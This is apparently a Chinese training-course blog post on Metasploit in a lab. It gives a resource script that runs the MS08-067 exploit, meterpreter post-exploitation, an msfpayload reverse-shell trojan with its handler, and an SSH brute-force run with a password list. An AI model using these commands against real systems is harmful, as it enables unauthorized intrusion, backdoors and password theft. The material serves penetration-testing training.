脚本攻击、后渗透攻击(网安全实训第四天)

1.通过脚本快速攻击

2.后渗透攻击续

1.通过脚本快速攻击

我们可以通过msfconsole -x “msfconsole内输入的命令”实现快速攻击,进一步,我们可以将攻击需要执行的命令写成脚本,进行攻击。

(1)编辑脚本

vi abin.rc

输入以下内容。(根据实际情况修改)

use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.183.132
set LHOST 192.168.183.131
exploit

(2)执行脚本

msfconsole -r abin.rc

通过之星脚本文件,直接攻击成功,获取shell。

补充:如果同时攻击成功多个主机,可以通过sessions来管理。

background 将当前会话放在后台
sessions -l 查看已经建立的会话
sessions -i 1 进入会话

 

2.后渗透攻击续

 

(1)截取屏幕

由于截屏需要在图形界面才可以看到,所以我们先进入图形界面。

startx
msfconsole -r abin.rc
screenshot (截屏)

截取的对方桌面:

其他命令可以通过输入 ? 查看:

(2)木马攻击

    1.生成木马文件

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.138.129 LPORT=5555 X >abin.exe

    2.木马服务器配置

    进入msfconsole,使用对应模块,这里使用exploit/multi/handler模块:

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.183.129 (设置监听主机,也就是bt5的地址)

set LPORT 5555 (设置监听端口,也就是上面的5555)

 

exploit (进入监听模式)

 

当有主机运行我们开始生成的木马程序,就可以获得对方主机shell。

 

3.暴力破解

    (1)使用msf自带模块进行暴力破解

进入msfconsole控制台:

msfconsole

 

使用auxiliary/scanner/ssh/ssh_login模块:

use auxiliary/scanner/ssh/ssh_login

 

show options

设置目标主机:

set RHOSTS 192.168.183.130

设置用户名:

set USERNAME msfadmin

也可以使用:set USER_FILE 从字典读取用户名。

设置密码字典:

set PASS_FILE pass.txt

pass.txt是我自己编写的一个简单字典,也可以根据社会工程学收集的信息,使用工具进行生成。

设置线程:(线程越多,速度越快,当然,需要的电脑配置越高)

set THREADS 10

开始暴力破解:

exploit

我们可以看到,已经爆破出ssh登录密码。

 

 

 

  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

abin在路上

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值